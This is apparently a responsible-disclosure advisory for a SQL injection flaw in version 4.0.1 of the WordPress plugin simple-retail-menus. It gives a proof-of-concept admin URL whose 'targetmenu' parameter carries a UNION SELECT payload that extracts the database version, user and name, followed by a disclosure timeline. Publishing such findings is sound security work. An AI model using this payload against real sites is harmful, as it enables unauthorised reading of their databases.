wp-plugin : simple-retail-menus – A1-Injection


Plugin Details


Plugin Name : simple-retail-menus


Effected Version : 4.0.1 (and most probably lower version's if any)

Vulnerability : A1-Injection
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Editor


PoC - (Proof of Concept) :


http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8


Vulnerable Parameter : targetmenu


Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1


Disclosure Timeline


Vendor Contacted : 2013-12-25

Plugin Status : Updated on 2014-02-19
Public Disclosure : May 28, 2014
CVE Number : Not assigned yet

Plugin Description :
Perfect for salon, restaurant, and retail store websites, as well as many other applications. Simple Retail Menus lets you create and manage menu-type lists for display in a post or page. This is a free, full-featured plugin. Create as many menus as you want, add as many items as you want to any menu, add menus to any post or page on your WordPress site.

It's simple and easy to use! Just build your menus, then copy/paste the resulting 'shortcode' into you post or page.

Example of a shortcode: [simple-retail-menu id="1"]

= Plugin's Official Site =


Leave a Reply

Your email address will not be published. Required fields are marked *